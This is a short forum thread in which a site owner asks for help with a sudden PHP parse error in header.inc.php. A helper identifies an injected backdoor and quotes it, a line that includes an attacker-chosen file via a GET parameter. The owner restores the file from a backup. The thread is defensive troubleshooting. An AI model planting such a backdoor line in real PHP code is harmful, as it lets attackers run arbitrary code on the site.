Urgent: unexpected T_CONSTANT_ENCAPSED_STRING

Hi

This is an urgent request for help Cry

I have searched the forums about this and I can only find one topic with the text in the title, but for some reason

boonex will not let me access the topic (i get permission denied.).

I have done nothing to my database, nothing to my source code. I go for a cup of tea, come back and all of a sudden I am getting the following error message when accessing the index page.:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/cbass/public_html/ray/modules/global/inc/header.inc.php on line 21

The site has been live for about a week so this is why I am very concerned. Users were steadily signing up, probably more so today and now no one can access this site.

PLEASE HELP, SOMEONE!

Cheers

Paul

I have just transferred the site database to my local machine which has my most recent source code. Everything works fine on the PC. Which suggests it is something to do with either the source code or something that has recently been uploaded to the site...

Hi!

hacker added code to make an error.

if (isset($_GET[bd])){include($bd);}
if (eregi("http"'$sIncPath)){exit;}

You can find and remove from header.inc.php

file path is /public_html/ray/modules/global/inc/header.inc.php

Then save and upload to your server.

Good Luck!

Thanks,

I am a bit bleary eyed this morning but I got it all up and running last night by replacing that file with a backup I had made the previous day.

I know what to do next time. Is there a way of preventing this in future? All the permissions were correct.

Cheers for your help.
